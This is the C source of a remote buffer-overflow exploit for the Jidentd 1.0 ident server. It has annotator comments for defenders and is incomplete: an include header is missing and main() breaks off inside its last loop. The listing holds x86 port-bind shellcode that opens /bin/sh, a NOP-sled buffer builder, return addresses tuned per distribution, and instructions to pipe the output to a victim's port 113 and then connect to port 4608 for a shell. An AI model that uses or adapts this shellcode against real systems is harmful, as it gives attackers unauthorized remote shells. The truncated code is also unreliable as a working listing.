/*
 * Jidentd 1.0 IDENT server remote sploit
 * funkySh 03/08/99(v.2) / port-bind shellcode by tekneeq
 *
 * run: jidex [offset] | nc victim 113
 *      telnet victim 4608
 *
 * tested under:
 *   Slackware 3.6, 4.0   offset = 0
 *   Debian    2.1        offset =
 *   Redhat    5.1, 5.2   offset = 700
 *             5.0        offset = 800
 *             4.1        offset =
 *
 * also try to modify ALIGN if not work.
 *
 * NOTE(review): this listing is incomplete as captured. The header name after
 * #include was lost in page extraction and main() is cut off inside its final
 * for-loop, so it does not compile as shown.
 *
 * Reading notes for defenders:
 *  - The per-distribution offset table and the hard-coded RET_ADDR show that
 *    the technique depends on a predictable stack address in the target
 *    process. Address-space randomisation and a non-executable stack remove
 *    that assumption; a patched or replaced ident daemon removes the bug.
 *  - Indicators visible on this page: input to TCP 113 that is far longer
 *    than a normal ident query and contains long runs of 0x90, and a new
 *    listener on TCP 4608 on the ident host afterwards.
 */
/* Header name missing on the page (stripped during extraction). */
#include
/*
 * Payload bytes. The header comment describes them as port-bind shellcode;
 * the literal ends with the string "/bin/sh".
 */
char code[] =
"\x31\xdb\xb0\x1b\xcd\x80\xeb\x40\x5e\x31\xc0\x40\x89\x46\x04"
"\x89\xc3\x40\x89\x06\xb0\x06\x89\x46\x08\xb0\x66\x8d\x0e\xcd"
"\x80\x89\x06\x8d\x4e\x0c\x89\x4e\x04\x31\xc0\x89\x46\x10\x89"
"\x46\x14\xb0\x02\x89\xc3\x89\x46\x0c\xb0\x12\x89\x46\x0e\xb0"
"\x10\x89\x46\x08\xb0\x66\x8d\x0e\xcd\x80\xeb\x02\xeb\x62\x31"
"\xdb\x89\xd8\xb3\x01\x89\x5e\x04\xb3\x04\x8d\x0e\xb0\x66\xcd"
"\x80\x31\xc0\x8d\x4e\x0c\x89\x4e\x04\x8d\x4e\x1c\x89\x4e\x08"
"\x8d\x0e\xb3\x05\xb0\x66\xcd\x80\x89\xc3\x31\xc0\x89\xc1\xb0"
"\x3f\xcd\x80\xb0\x3f\xfe\xc1\xcd\x80\xfe\xc1\xb0\x3f\xcd\x80"
"\x89\xf2\x83\xc2\x20\x89\xd6\x89\x76\x08\x31\xc0\x88\x46\x07"
"\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80"
"\x31\xdb\x89\xd8\x40\xcd\x80\xe8\x57\xff\xff\xff\x6a\x75\x6e"
"\x6b\x6a\x75\x6e\x6b\x6a\x75\x6e\x6b\x6a\x75\x6e\x6b\x6a\x75"
"\x6e\x6b\x6a\x75\x6e\x6b\x6a\x75\x6e\x6b\x6a\x75\x6e\x6b/bin/sh";
/* Size in bytes of the output buffer buf. */
#define BUFFER 1100
/* Fill byte for the whole buffer; 0x90 is the one-byte x86 NOP opcode. */
#define NOP 0x90
/* Base address that the command-line offset is added to in main(). */
#define RET_ADDR 0xbffff704
/* Added to the start index of the final loop; the header says to adjust it if the default fails. */
#define ALIGN 0
/* Output buffer assembled in main(). */
char buf[BUFFER];
/*
 * Builds the buffer: an optional numeric offset is read from argv[1], the
 * buffer is filled with NOP bytes, and the payload is copied in at byte 700.
 * Everything after the start of the final loop is missing from the page, so
 * how `address` is used and how the buffer is emitted cannot be seen here.
 */
void main(int argc, char * argv[]) {
int i, offset = 0;
long address;
/* atoi gives no error reporting; a non-numeric argument yields offset 0. */
if(argc > 1) offset = atoi(argv[1]);
address = RET_ADDR + offset;
memset(buf,NOP,BUFFER);
/* strlen stops at the first NUL byte, so only the bytes before it are copied. */
memcpy(buf+700,code,strlen(code));
/* Loop begins at index 923+ALIGN; presumably it writes `address` into the tail of buf — not visible, confirm against a complete copy. */
for(i=923+ALIGN;i
/* listing truncated here on the page; the remainder of main() is not shown */